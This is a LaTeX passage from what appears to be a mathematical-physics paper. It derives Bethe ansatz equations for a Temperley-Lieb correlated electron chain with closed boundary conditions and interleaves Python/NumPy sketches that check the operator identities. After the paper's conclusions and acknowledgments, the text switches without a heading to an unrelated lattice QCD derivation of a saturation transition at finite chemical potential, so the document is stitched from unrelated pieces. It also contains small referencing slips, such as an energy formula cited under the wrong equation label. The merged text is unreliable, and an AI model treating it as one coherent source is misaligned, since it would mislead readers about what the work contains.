&=&(-1)^{l}\prod_{b=l+1,\,b\neq a}^{l+p}\left\{ -\frac{1+\xi _{b}\xi
_{a}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{b}}\right\}
\nonumber \\
a &=&l+1,l+2,...,l+p,\qquad p\geq 2 \nonumber \\
\xi _{l+1}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi _{l}^{2} &=&(-1)^{l},\qquad
p=1 \nonumber \\
\xi _{c}^{N-2p} &=&(-1)^{p},\quad c=1,2,...,l \nonumber \\
\xi ^{N} &=&1,\qquad \xi =\xi _{1}\xi _{2}\cdots \xi _{l}\xi _{l+1}\xi
_{l+2}\cdots \xi _{l+p}. \label{pba60}
\end{eqnarray}
The energy eigenvalues and the Bethe equations depend on the deformation
parameter $q$, through the relation $Q+Q^{-1}=2q+2q^{-1}$.
\section{Bethe ansatz solution for closed boundary conditions}
The quantum group invariant closed TL Hamiltonian can be written
as \cite{cinco}:
\begin{equation}
H=\sum_{k=1}^{N-1}U_{k}+{\cal U}_{0} \label{cbah}
\end{equation}
where $U_{k}$ is a Temperley-Lieb operator and ${\cal U}_{0}$ is a boundary
term defined through an operator $G$ which plays the role of the
translation operator
\begin{equation}
{\cal U}_{0}=GU_{N-1}G^{-1}\quad ,\quad G=(Q-U_{1})(Q-U_{2})\cdots
(Q-U_{N-1}) \label{cba1}
\end{equation}
satisfying $[H,G]=0$ and, additionally, invariance with respect to the
quantum
algebra. The operator $G$ shifts the $U_{k}$ by one unit, $%
GU_{k}G^{-1}=U_{k+1}$, and maps ${\cal U}_{0}$ into $U_{1}$, which manifests
the translational invariance of $H$. In this sense the Hamiltonian (\ref{cbah}) is
periodic. From the physical point of view, this type of model
exhibits behavior similar to closed chains with twisted boundary conditions
(see for example \cite{pal2} for the case of the XXZ chain).
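The algebraic properties of $G$ can be verified directly for a small chain. The sketch below is our own check ($q=1.3$, $N=4$ are arbitrary choices), with $Q$ fixed by $Q+Q^{-1}=2(q+q^{-1})$ and the matrix $T$ and helper \texttt{embed\_pair} as in the earlier sketches.

```python
import numpy as np

q, d, N = 1.3, 4, 4
s = 2*(q + 1/q)                          # Q + Q^{-1}
Q = (s + np.sqrt(s*s - 4))/2             # one root of x^2 - s x + 1 = 0

c = np.zeros(d*d)
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    # two-site operator op2 on sites i, j (0-based), identity elsewhere
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

dim = d**N
U = [embed_pair(T, k, k+1, N) for k in range(N-1)]     # U_1, ..., U_{N-1}
G = np.eye(dim)
for Uk in U:                                           # G = (Q-U_1)...(Q-U_{N-1})
    G = G @ (Q*np.eye(dim) - Uk)
Ginv = np.eye(dim)
for Uk in reversed(U):                                 # G^{-1} = (Q^{-1}-U_{N-1})...(Q^{-1}-U_1)
    Ginv = Ginv @ (np.eye(dim)/Q - Uk)

assert np.allclose(G @ Ginv, np.eye(dim))
for k in range(N - 2):
    assert np.allclose(G @ U[k] @ Ginv, U[k+1])        # G shifts U_k by one unit
U0 = G @ U[-1] @ Ginv                                  # the boundary term
H = sum(U) + U0
assert np.allclose(G @ U0 @ Ginv, U[0])                # G maps U_0 into U_1
assert np.allclose(H @ G, G @ H)                       # [H, G] = 0
```

Note that the inverse formula relies only on $U_{k}^{2}=(Q+Q^{-1})U_{k}$, since $(Q-U_{k})(Q^{-1}-U_{k})=1$.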
The action of the operator $G$ on the states $\left| \Omega (k)\right\rangle
$ can be easily computed using (\ref{pba2}), (\ref{pba3}) and
(\ref{pba4}): it is simple in the bulk and at
the left boundary
\begin{equation}
G\left| \Omega (k)\right\rangle =-Q^{N-2}\ \left| \Omega (k+1)\right\rangle
{\rm \quad },{\rm \quad }1\leq k\leq N-2 \label{cba5}
\end{equation}
but has a non-trivial contribution at the right boundary
\begin{equation}
G\left| \Omega (N-1)\right\rangle =Q^{N-2}\sum_{k=1}^{N-1}(-Q)^{-k}\ \left|
\Omega (N-k)\right\rangle \label{cba6}
\end{equation}
Similarly, the action of the operator $G^{-1}=(Q^{-1}-U_{N-1})\cdots
(Q^{-1}-U_{1})$ is simple in the bulk and at the right boundary
\begin{equation}
G^{-1}\left| \Omega (k)\right\rangle =-Q^{-N+2}\left| \Omega
(k-1)\right\rangle \ \quad ,\quad 2\leq k\leq N-1 \label{cba7}
\end{equation}
and non-trivial at the left boundary
\begin{equation}
G^{-1}\left| \Omega (1)\right\rangle =Q^{-N+2}\sum_{k=1}^{N-1}(-Q)^{k}\
\left| \Omega (k)\right\rangle . \label{cba8}
\end{equation}
Now we proceed with the diagonalization of $H$ as was done for the periodic case.
As (\ref{cbah}) and (\ref{eq1.1}) have the same bulk,{\it \ i.e.},
differences arise from the boundary terms only, we will keep all
results relating
to the bulk of the periodic case presented in the previous section.
Let us consider one free pseudoparticle which lies in the sector $r=3$
\begin{equation}
\Psi _{3}=\sum_{k=1}^{N-1}A(k)\left| \Omega (k)\right\rangle .
\label{cba9}
\end{equation}
The action of the operator ${\cal U}=\sum_{k=1}^{N-1}U_{k}$ on the states $%
\left| \Omega (k)\right\rangle $ is:
\begin{eqnarray}
{\cal U}\left| \Omega (1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(1)\right\rangle +\left| \Omega (2)\right\rangle \nonumber \\
{\cal U}\left| \Omega (k)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(k)\right\rangle +\left| \Omega (k-1)\right\rangle +\left| \Omega
(k+1)\right\rangle \nonumber \\
\qquad \quad \text{{\rm for }\ }2 &\leq &k\leq N-2 \nonumber \\
{\cal U}\left| \Omega (N-1)\right\rangle &=&(Q+Q^{-1})\left| \Omega
(N-1)\right\rangle +\left| \Omega (N-2)\right\rangle . \label{cba10}
\end{eqnarray}
and using (\ref{cba5})--(\ref{cba8}) one can see that the action of ${\cal U}%
_{0}=GU_{N-1}G^{-1}$ vanishes in the bulk
\begin{equation}
{\cal U}_{0}\left| \Omega (k)\right\rangle =0\quad ,\quad 2\leq k\leq N-2
\label{cba13}
\end{equation}
and has the following contributions at the boundaries
\begin{equation}
{\cal U}_{0}\left| \Omega (1)\right\rangle =-\sum_{k=1}^{N-1}\ (-Q)^{k}\
\left| \Omega (k)\right\rangle ,\quad {\cal U}_{0}\left| \Omega
(N-1)\right\rangle =-\sum_{k=1}^{N-1}\ (-Q)^{-N+k}\ \left| \Omega
(k)\right\rangle . \label{cba14}
\end{equation}
which are connected by
\begin{equation}
{\cal U}_{0}\left| \Omega (N-1)\right\rangle =(-Q)^{-N}\ {\cal U}_{0}\left|
\Omega (1)\right\rangle . \label{cba15}
\end{equation}
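The boundary actions (\ref{cba5}) and (\ref{cba13})--(\ref{cba15}) can be checked by constructing the vectors $\left| \Omega (k)\right\rangle $ explicitly. The sketch below is our own check ($q=1.3$, $N=5$ arbitrary; $T$, \texttt{embed\_pair}, $U_{k}$, $G$ and ${\cal U}_{0}$ built as in the previous sketch).

```python
import numpy as np

q, d, N = 1.3, 4, 5
s = 2*(q + 1/q)
Q = (s + np.sqrt(s*s - 4))/2

c = np.zeros(d*d)
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    # two-site operator op2 on sites i, j (0-based), identity elsewhere
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

dim = d**N
U = [embed_pair(T, k, k+1, N) for k in range(N-1)]
G = np.eye(dim)
for Uk in U:
    G = G @ (Q*np.eye(dim) - Uk)
Ginv = np.eye(dim)
for Uk in reversed(U):
    Ginv = Ginv @ (np.eye(dim)/Q - Uk)
U0 = G @ U[-1] @ Ginv

def omega(k):
    # |Omega(k)> of eq. (pba2): pair on sites (k, k+1), 1-based; spin 3/2 elsewhere
    amps = {(3, 0): 1.0, (2, 1): 1.0, (1, 2): -q, (0, 3): q}
    v = np.zeros(dim)
    for (x, y), a in amps.items():
        dig = [0]*N
        dig[k-1], dig[k] = x, y
        idx = 0
        for t in dig:
            idx = idx*d + t
        v[idx] = a
    return v

Om = {k: omega(k) for k in range(1, N)}
for k in range(1, N-1):
    assert np.allclose(G @ Om[k], -Q**(N-2) * Om[k+1])         # eq. (cba5)
for k in range(2, N-1):
    assert np.allclose(U0 @ Om[k], 0)                          # eq. (cba13)
rhs = -sum((-Q)**k * Om[k] for k in range(1, N))
assert np.allclose(U0 @ Om[1], rhs)                            # eq. (cba14)
assert np.allclose(U0 @ Om[N-1], (-Q)**(-N) * (U0 @ Om[1]))    # eq. (cba15)
```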
Before we substitute these results into the eigenvalue equation, we will
define two new states
\begin{equation}
\left| \Omega (0)\right\rangle ={\cal U}_{0}\left| \Omega (1)\right\rangle
,\quad \ \left| \Omega (N)\right\rangle ={\cal U}_{0}\left| \Omega
(N-1)\right\rangle \label{cba16}
\end{equation}
to include the cases $k=0$ and $k=N$ into the definition of $\Psi _{3}$,
equation (\ref{cba9}). Finally, the action of $H={\cal U}+{\cal U}_{0}$ on
the states $\left| \Omega (k)\right\rangle $ is
\begin{eqnarray}
H\left| \Omega (0)\right\rangle &=&(Q+Q^{-1})\left| \Omega (0)\right\rangle
+(-Q)^{N}\left| \Omega (N-1)\right\rangle +\left| \Omega (1)\right\rangle
\nonumber \\
&& \nonumber \\
H\left| \Omega (N)\right\rangle &=&(Q+Q^{-1})\left| \Omega (N)\right\rangle
+\left| \Omega (N-1)\right\rangle +(-Q)^{-N}\left| \Omega (1)\right\rangle
\label{cba17}
\end{eqnarray}
Substituting these results into the eigenvalue equation\ $H\Psi _{3}=E_{3}\
\Psi _{3}$ we get a complete set of eigenvalue equations for the
wavefunctions
\begin{eqnarray}
E_{3}\ A(k) &=&(Q+Q^{-1})A(k)+A(k-1)+A(k+1) \nonumber \\
\quad \qquad \text{{\rm for }}1 &\leq &k\leq N-1 \label{cba18}
\end{eqnarray}
provided the following boundary conditions
\begin{equation}
(-Q)^{N}A(k)=A(N+k)\text{ } \label{cba20}
\end{equation}
are satisfied.
The plane wave parametrization $A(k)=A\xi ^{k}$ solves these eigenvalue
equations and the boundary conditions provided that:
\begin{eqnarray}
E_{3} &=&Q+Q^{-1}+\xi +\xi ^{-1}\quad \nonumber \\
\xi ^{N} &=&(-Q)^{N} \label{cba21}
\end{eqnarray}
where $\xi ={\rm e}^{i\theta }$, with $\theta $ the momentum.
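Since $|\xi |=Q\neq 1$ here, part of these levels are complex, consistent with the fact that ${\cal U}_{0}$ is not Hermitian; they can nevertheless be compared with the exact (complex) spectrum. The sketch below is our own check ($q=1.3$, $N=4$ arbitrary; $T$, \texttt{embed\_pair}, $U_{k}$, $G$ and ${\cal U}_{0}$ as in the previous sketches).

```python
import numpy as np

q, d, N = 1.3, 4, 4
s = 2*(q + 1/q)
Q = (s + np.sqrt(s*s - 4))/2

c = np.zeros(d*d)
c[3*d+0], c[0*d+3], c[2*d+1], c[1*d+2] = q**-0.5, q**0.5, q**-0.5, -q**0.5
T = np.outer(c, c)

def embed_pair(op2, i, j, N, d=4):
    # two-site operator op2 on sites i, j (0-based), identity elsewhere
    dim = d**N
    M = np.zeros((dim, dim))
    for col in range(dim):
        dig = [(col // d**(N-1-t)) % d for t in range(N)]
        colpair = dig[i]*d + dig[j]
        for rowpair in range(d*d):
            if op2[rowpair, colpair] != 0.0:
                new = list(dig)
                new[i], new[j] = rowpair // d, rowpair % d
                row = 0
                for t in new:
                    row = row*d + t
                M[row, col] += op2[rowpair, colpair]
    return M

dim = d**N
U = [embed_pair(T, k, k+1, N) for k in range(N-1)]
G = np.eye(dim)
for Uk in U:
    G = G @ (Q*np.eye(dim) - Uk)
Ginv = np.eye(dim)
for Uk in reversed(U):
    Ginv = Ginv @ (np.eye(dim)/Q - Uk)
H = sum(U) + G @ U[-1] @ Ginv            # eq. (cbah)

evals = np.linalg.eigvals(H)             # non-Hermitian: complex eigenvalues allowed
for l in range(N):
    xi = -Q * np.exp(2j*np.pi*l/N)       # xi^N = (-Q)^N
    E3 = (Q + 1/Q) + xi + 1/xi
    assert np.min(np.abs(evals - E3)) < 1e-6
print("all one-pseudoparticle CBC levels found")
```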
Let us now consider the sector $r=6$, where we can find an eigenstate with
two interacting pseudoparticles. We seek the corresponding eigenfunction as
products of single-pseudoparticle eigenfunctions, {\it i.e}.
\begin{equation}
\Psi _{6}=\sum_{k_{1}+1<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle \label{cba22}
\end{equation}
To solve the eigenvalue equation $H\Psi _{6}=E_{6}\Psi _{6}$, we recall
(\ref{pba4}) to get the action of ${\cal U}$ and ${\cal U}_{0}$ on the states $%
\left| \Omega (k_{1},k_{2})\right\rangle $. Here we have to consider four
cases: ({\it i})\ when the two pseudoparticles are separated in the bulk,
the action of ${\cal U}$ is
\begin{eqnarray}
{\cal U}\left| \Omega (k_{1},k_{2})\right\rangle &=&2(Q+Q^{-1})\left|
\Omega (k_{1},k_{2})\right\rangle +\left| \Omega
(k_{1}-1,k_{2})\right\rangle +\left| \Omega (k_{1}+1,k_{2})\right\rangle
\nonumber \\
&&+\left| \Omega (k_{1},k_{2}-1)\right\rangle +\left| \Omega
(k_{1},k_{2}+1)\right\rangle \label{cba24}
\end{eqnarray}
i.e., for $k_{1}$ $\geq 2$ and $k_{1}+3\leq k_{2}\leq N-2$; ({\it ii}) when
the two pseudoparticles are separated but one of them or both are at the
boundaries
\begin{eqnarray}
{\cal U}\left| \Omega (1,k_{2})\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(1,k_{2})\right\rangle +\left| \Omega (2,k_{2})\right\rangle +\left| \Omega
(1,k_{2}-1)\right\rangle \nonumber \\
&&+\left| \Omega (1,k_{2}+1)\right\rangle \label{cba25}
\end{eqnarray}
\begin{eqnarray}
{\cal U}\left| \Omega (k_{1},N-1)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k_{1},N-1)\right\rangle +\left| \Omega (k_{1}-1,N-1)\right\rangle
\nonumber \\
&&+\left| \Omega (k_{1}+1,N-1)\right\rangle +\left| \Omega
(k_{1},N-2)\right\rangle \label{cba26}
\end{eqnarray}
\begin{equation}
{\cal U}\left| \Omega (1,N-1)\right\rangle =2(Q+Q^{-1})\left| \Omega
(1,N-1)\right\rangle +\left| \Omega (2,N-1)\right\rangle +\left| \Omega
(1,N-2)\right\rangle \label{ba27}
\end{equation}
where $2\leq k_{1}\leq N-4$ and $4\leq k_{2}\leq N-2$; ({\it iii}) when the
two pseudoparticles are neighbors in the bulk
\begin{eqnarray}
{\cal U}\left| \Omega (k,k+2)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k,k+2)\right\rangle +\left| \Omega (k-1,k+2)\right\rangle +\left| \Omega
(k,k+3)\right\rangle \nonumber \\
&&+U_{k+1}\left| \Omega (k,k+2)\right\rangle \label{cba28}
\end{eqnarray}
for $2\leq k\leq N-4$ and ({\it iv}) when the two pseudoparticles are
neighbors and at the boundaries
\begin{equation}
{\cal U}\left| \Omega (1,3)\right\rangle =2(Q+Q^{-1})\left| \Omega
(1,3)\right\rangle +\left| \Omega (1,4)\right\rangle +U_{2}\left| \Omega
(1,3)\right\rangle \label{cba29}
\end{equation}
\begin{eqnarray}
{\cal U}\left| \Omega (N-3,N-1)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(N-3,N-1)\right\rangle +\left| \Omega (N-4,N-1)\right\rangle \nonumber \\
&&+U_{N-2}\left| \Omega (N-3,N-1)\right\rangle \label{cba30}
\end{eqnarray}
Moreover, the action of ${\cal U}_{0}$ does not depend on whether the
pseudoparticles are separated or neighbors. It vanishes in the
bulk
\begin{equation}
{\cal U}_{0}\left| \Omega (k_{1},k_{2})\right\rangle =0\quad \text{{\rm for}
\quad }k_{1}\neq 1\ \text{{\rm and} }k_{2}\neq N-1, \label{cba31}
\end{equation}
and is nonzero at the boundaries:
\begin{eqnarray}
{\cal U}_{0}\left| \Omega (1,k_{2})\right\rangle
&=&-\sum_{k=1}^{k_{2}-2}(-Q)^{k}\left| \Omega (k,k_{2})\right\rangle
-(-Q)^{k_{2}-1}U_{k_{2}}\left| \Omega (k_{2}-1,k_{2}+1)\right\rangle \nonumber \\
&&-\sum_{k=k_{2}+2}^{N-1}(-Q)^{k-2}\left| \Omega (k_{2},k)\right\rangle
\label{cba32}
\end{eqnarray}
\begin{equation}
{\cal U}_{0}\left| \Omega (k_{1},N-1)\right\rangle =(-Q)^{-N+2}\ {\cal U}%
_{0}\left| \Omega (1,k_{2})\right\rangle \label{cba33}
\end{equation}
where $2\leq k_{1}\leq N-3$ and $3\leq k_{2}\leq N-2$.
Following the same procedure as in the one-pseudoparticle case we again define
new states in order to have consistency between bulk and boundary terms
\begin{eqnarray}
{\cal U}_{0}\left| \Omega (1,k_{2})\right\rangle &=&\left| \Omega
(0,k_{2})\right\rangle ,\quad {\cal U}_{0}\left| \Omega
(k_{1},N-1)\right\rangle =\left| \Omega (k_{1},N)\right\rangle \nonumber \\
{\cal U}_{0}\left| \Omega (1,N-1)\right\rangle &=&\left| \Omega
(0,N-1)\right\rangle +\left| \Omega (1,N)\right\rangle \nonumber \\
U_{k+1}\left| \Omega (k,k+2)\right\rangle &=&\left| \Omega
(k,k+1)\right\rangle +\left| \Omega (k+1,k+2)\right\rangle \label{cba34}
\end{eqnarray}
Acting with $H$ on these new states, we get
\begin{eqnarray}
H\left| \Omega (0,k_{2})\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(0,k_{2})\right\rangle +\left| \Omega (0,k_{2}-1)\right\rangle +\left|
\Omega (0,k_{2}+1)\right\rangle \nonumber \\
&&+\left| \Omega (1,k_{2})\right\rangle +(-Q)^{N-2}\left| \Omega
(k_{2},N-1)\right\rangle \label{cba35}
\end{eqnarray}
\begin{eqnarray}
H\left| \Omega (k_{1},N)\right\rangle &=&2(Q+Q^{-1})\left| \Omega
(k_{1},N)\right\rangle +\left| \Omega (k_{1}-1,N)\right\rangle +\left|
\Omega (k_{1}+1,N)\right\rangle \nonumber \\
&&+\left| \Omega (k_{1},N-1)\right\rangle +(-Q)^{-N+2}\left| \Omega
(1,k_{1})\right\rangle \label{cba36}
\end{eqnarray}
\begin{equation}
H\left| \Omega (k,k+1)\right\rangle =(Q+Q^{-1})\left| \Omega
(k,k+1)\right\rangle +\left| \Omega (k-1,k+1)\right\rangle +\left| \Omega
(k,k+2)\right\rangle \label{cba37}
\end{equation}
Substituting these results into the eigenvalue equation, we get the
following equations for wavefunctions corresponding to the separated
pseudoparticles.
\begin{eqnarray}
(E_{6}-2Q-2Q^{-1})A(k_{1},k_{2}) &=&A(k_{1}-1,k_{2})+A(k_{1}+1,k_{2})
\nonumber \\
&&+A(k_{1},k_{2}-1)+A(k_{1},k_{2}+1) \label{cba38}
\end{eqnarray}
{\it i.e}., for $k_{1}\geq 1$ and $k_{1}+3\leq k_{2}\leq N-1$. The boundary
conditions now read
\begin{equation}
A(k_{2},N+k_{1})=(-Q)^{N-2}A(k_{1},k_{2}). \label{cba39}
\end{equation}
The parametrization for the wavefunctions
\begin{equation}
A(k_{1},k_{2})=A_{12}\xi _{1}^{k_{1}}\xi _{2}^{k_{2}}+A_{21}\xi
_{1}^{k_{2}}\xi _{2}^{k_{1}} \label{cba40}
\end{equation}
solves the equation (\ref{cba38}) provided that
\begin{equation}
E_{6}=2(Q+Q^{-1})+\xi _{1}+\xi _{1}^{-1}+\xi _{2}+\xi _{2}^{-1}
\label{cba41}
\end{equation}
and the boundary conditions (\ref{cba39}) provided that
\begin{equation}
\xi _{2}^{N}=(-Q)^{N-2}\frac{A_{21}}{A_{12}}\quad ,\quad \xi
_{1}^{N}=(-Q)^{N-2}\frac{A_{12}}{A_{21}}\Rightarrow \xi ^{N}=(-Q)^{2(N-2)}
\label{cba42}
\end{equation}
where $\xi =\xi _{1}\xi _{2}=e^{i(\theta _{1}+\theta _{2})}$, $\theta
_{1}+\theta _{2}$ being the total momenta.
Now we include the new states (\ref{cba34}) into the definition of $\Psi _{6}
$ in order to extend (\ref{cba22}) to
\begin{equation}
\Psi _{6}=\sum_{k_{1}<k_{2}}A(k_{1},k_{2})\left| \Omega
(k_{1},k_{2})\right\rangle . \label{cba43}
\end{equation}
Here we have used the same notation for separated and neighboring states.
Substituting (\ref{cba28}) and (\ref{cba37}) into the eigenvalue equation,
we get
\begin{equation}
(E_{6}-Q-Q^{-1})A(k,k+1)=A(k-1,k+1)+A(k,k+2) \label{cba44}
\end{equation}
which gives us the phase shift produced by the interchange of the two
pseudoparticles
\begin{equation}
\frac{A_{21}}{A_{12}}=-\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi +(Q+Q^{-1})\xi
_{1}}. \label{cba45}
\end{equation}
We thus arrive at the Bethe ansatz equations which fix the values of $\xi
_{1}$ and $\xi _{2}$:
\begin{eqnarray}
\xi _{2}^{N} &=&(-Q)^{N-2}\left\{ -\frac{1+\xi +(Q+Q^{-1})\xi _{2}}{1+\xi
+(Q+Q^{-1})\xi _{1}}\right\} , \nonumber \\
\quad \xi _{1}^{N}\xi _{2}^{N} &=&(-Q)^{2(N-2)} \label{cba46}
\end{eqnarray}
Thus in the sector $r=3p$, we expect that the $p$-pseudoparticle phase shift
will be a sum of
two-pseudoparticle phase shifts and the
energy is given by
\begin{equation}
E_{3p}=\sum_{n=1}^{p}\left\{ Q+Q^{-1}+\xi _{n}+\xi _{n}^{-1}\right\}
\label{cba48}
\end{equation}
where
\[
\xi _{a}^{N}=(-Q)^{N-2p+2}\prod_{b\neq a}^{p}\left\{ -\frac{1+\xi _{a}\xi
_{b}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{b}}\right\}
,\quad a=1,...,p
\]
\begin{equation}
\left( \xi _{1}\xi _{2}\cdots \xi _{p}\right) ^{N}=(-Q)^{p(N-2p+2)}
\label{cba49}
\end{equation}
The corresponding eigenstates are
\begin{equation}
\Psi _{r}(\xi _{1},\xi _{2},...\xi _{p})=\sum_{1\leq k_{1}<...<k_{p}\leq
N-1}A(k_{1},k_{2},...,k_{p})\left| \Omega
(k_{1},k_{2},...,k_{p})\right\rangle \label{cba49a}
\end{equation}
where $\left| \Omega (k_{1},k_{2},...,k_{p})\right\rangle =\otimes
_{i=1}^{p}\left| \Omega (k_{i})\right\rangle $ and the wavefunctions satisfy
the following boundary conditions
\begin{equation}
A(k_{1},k_{2},...,k_{p},N+k_{1})=(-Q)^{N-2p+2}A(k_{1},k_{2},...,k_{p})
\label{cba49b}
\end{equation}
This is not all: in a sector $r$ we may have $p$ pseudoparticles and $N_{\frac{1%
}{2}},N_{\frac{-1}{2}}$ impurities of the types $\frac{1}{2}$ and $\frac{-1}{2}$,
respectively. Since $H$ is a sum of projectors on spin zero, these states
are also annihilated by ${\cal U}_{0}$. Therefore the impurities play here
the same role as in the periodic case. This means that for a sector $r$ with
$l$ impurities with parameters $\xi _{1},...,\xi _{l}$ and $p$ pseudoparticles
with parameters $\xi _{l+1},...,\xi _{l+p}$ the energy is given by
(\ref{cba49}), and the Bethe equations do not depend on the impurity type and
are given by
\begin{equation}
\xi _{a}^{N}\xi _{1}^{2}\xi _{2}^{2}\cdots \xi
_{l}^{2}=(-1)^{l}(-Q)^{N-2p+2} \prod_{b=l+1, b\neq a}^{l+p}
\left\{
-\frac{1+\xi _{a}\xi _{b}+(Q+Q^{-1})\xi _{a}}{1+\xi _{a}\xi
_{b}+(Q+Q^{-1})\xi _{b}}\right\} \label{cba51}
\end{equation}
with $a=l+1,l+2,...,l+p\quad ,\quad p\geq 1$, and
\begin{equation}
\xi ^{2p}(\xi _{l+1}\cdots \xi _{l+p})^{N-2p}=(-1)^{l}(-Q)^{p(N-2p+2)}
\label{cba52}
\end{equation}
where $\xi =
\xi _{1}\xi _{2}\cdots \xi _{l}\xi _{l+1}\cdots \xi _{l+p}$.
Notice in the BAE (\ref{cba51}) the presence of a
special ``$q$-term'' $((-Q)^{N-2p+2})$ in comparison with the
corresponding equations for the usual periodic boundary conditions (\ref{pba60}).
In fact, this feature also appeared in other models
\cite{KZ,grosse,foercb}
and seems to be a peculiarity of quantum group invariant closed spin
chains.
\section{Conclusions}
We have applied the coordinate Bethe ansatz to find the
spectra of the anisotropic correlated electron system associated with
the TL algebra. This procedure was carried out for periodic and closed
boundary conditions, and the differences between the two cases
have been pointed out.
We believe that the methods presented here could also be applied to
solve a larger class of Hamiltonians derived from representations
of the graded TL algebra, such as the orthosymplectic models discussed
by Zhang in \cite{zhng}. This is presently under investigation.
Another interesting extension of this work would be to adapt the methods
employed in this paper to solve multiparametric versions of these
models \cite{doze,mult}.
\vspace{1cm}
{\bf Acknowledgment:}
The support of CNPq - Conselho Nacional de
Desenvolvimento Cient\'{\i}fico e Tecnol\'ogico is gratefully
acknowledged.
A.L.S also thanks FAPESP -
Funda\c{c}\~{a}o de Amparo \`{a} Pesquisa do Estado de S\~{a}o Paulo
for financial assistance. A.F. would like to thank the Institute
f\"ur Theoretische Physik - FUB for its kind hospitality, particularly
M. Karowski. She also thanks DAAD - Deutscher Akademischer Austauschdienst
and FAPERGS - Funda\c{c}\~{a}o de Amparo \`{a} Pesquisa do Estado
do Rio Grande do Sul for financial support.
The Dirac-Kogut-Susskind operator of QCD at finite chemical potential can be
written as
\begin{equation}\label{1}
2 \Delta = 2mI + e^\mu G + e^{-\mu} G^\dagger + V
\end{equation}
\noindent
where $G$ ($G^+$) contains all forward (backward) temporal links and V all
space-like links.
The determinant of $\Delta$ in the integration
measure can be replaced, at large fermion masses $m$, by
\begin{equation}\label{2}
\det \Delta = m^{3V_sL_t}\det \left( I + \frac{e^\mu}{2m} G \right)
\end{equation}
If the fugacity $e^\mu$ is much smaller than $2m$, the second factor of (2)
can be replaced by 1 and the theory is independent of the chemical potential.
Therefore, in order to get a non trivial $\mu$ dependence, we need to go
to a region of large chemical potential in which the fugacity is of the
order of $2m$ \cite{TOUS}.
Since all space-like links have disappeared in equation (2), the determinant
of $\Delta$ factorizes as a product of $V_s$ determinants for the single
temporal chains. A straightforward calculation allows us to write
\begin{equation}\label{3}
\det \Delta = e^{3V_sL_t\mu} \prod_{i=1}^{V_s} \det (c + L_i )
\end{equation}
\noindent
with $c=({2m\over{e^\mu}})^{L_t}$, $L_t$ is the lattice
temporal extent and $L_i$
the SU(3) variable representing the forward straight Polyakov loop starting
from the spatial site $i$ and circling once the lattice in the temporal
direction. The determinants in (3) are gauge invariant quantities which can
therefore be written as functions of the trace and the determinant of $L_i$.
Since the gauge group is a unitary group, $\det(L_i)=1$
and therefore the only contributions depending on the gauge configuration
will be functions of $Tr(L_i)$. In fact simple algebra allows us to write
\begin{equation}\label{4}
\det (c + L_i ) = c^3 + c^2 Tr (L_i) + c Tr (L_i^*) + 1
\end{equation}
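A quick numerical sanity check of this identity, and of the group average $\int dL\,\det(c+L)=c^{3}+1$ (since $\langle Tr\,L\rangle=0$ for Haar-random SU(3)) that underlies the $\beta=0$ result below, can be done in a few lines of NumPy (a sketch; the SU(3) sampling uses the standard QR recipe):

```python
import numpy as np

rng = np.random.default_rng(0)

def random_su3():
    """Haar-random SU(3): QR of a complex Gaussian, column phases fixed,
    then the overall determinant phase removed."""
    z = rng.normal(size=(3, 3)) + 1j * rng.normal(size=(3, 3))
    q, r = np.linalg.qr(z)
    q = q @ np.diag(np.diag(r) / np.abs(np.diag(r)))
    return q / np.linalg.det(q) ** (1.0 / 3.0)

c = 0.8
L = random_su3()
lhs = np.linalg.det(c * np.eye(3) + L)
rhs = c**3 + c**2 * np.trace(L) + c * np.trace(L.conj()) + 1.0
print(abs(lhs - rhs))                      # identity (4): ~1e-15

# Haar average: <Tr L> = 0, so <det(c + L)> = c^3 + 1
avg = np.mean([np.linalg.det(c * np.eye(3) + random_su3()) for _ in range(4000)])
print(avg)                                  # close to c^3 + 1 = 1.512
```

The Monte Carlo average reproduces $c^3+1$ within the expected statistical error.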
In the infinite gauge coupling limit, the integration over the gauge group
is trivial since we get factorization \cite{LAT98}.
The final result for the partition
function at $\beta=0$ is
\begin{equation}\label{5}
{\cal Z} =
V_G e^{3V_sL_t\mu}
\left( \left(\frac{2m}{e^\mu}\right)^{3L_t} +1 \right)^{V_s}
\end{equation}
\noindent
where $V_G$ is a constant irrelevant factor diverging exponentially
with the lattice
volume which accounts for the gauge group volume. Equation (5)
gives for the free energy density $f={1\over{3V_sL_t}}\log{\cal Z}$
\begin{equation}\label{6}
f = \mu +
\frac{1}{3L_t} \log \left( \left(\frac{2m}{e^\mu}\right)^{3L_t} +1 \right)
\end{equation}
The first contribution in (6) is an analytic function of $\mu$. The second
contribution has, in the limit of infinite temporal lattice extent,
a non-analyticity at $\mu_c=\log(2m)$ which induces a step jump in
the number density, the signature of a first order saturation transition at
the value of $\mu_c$ given above.
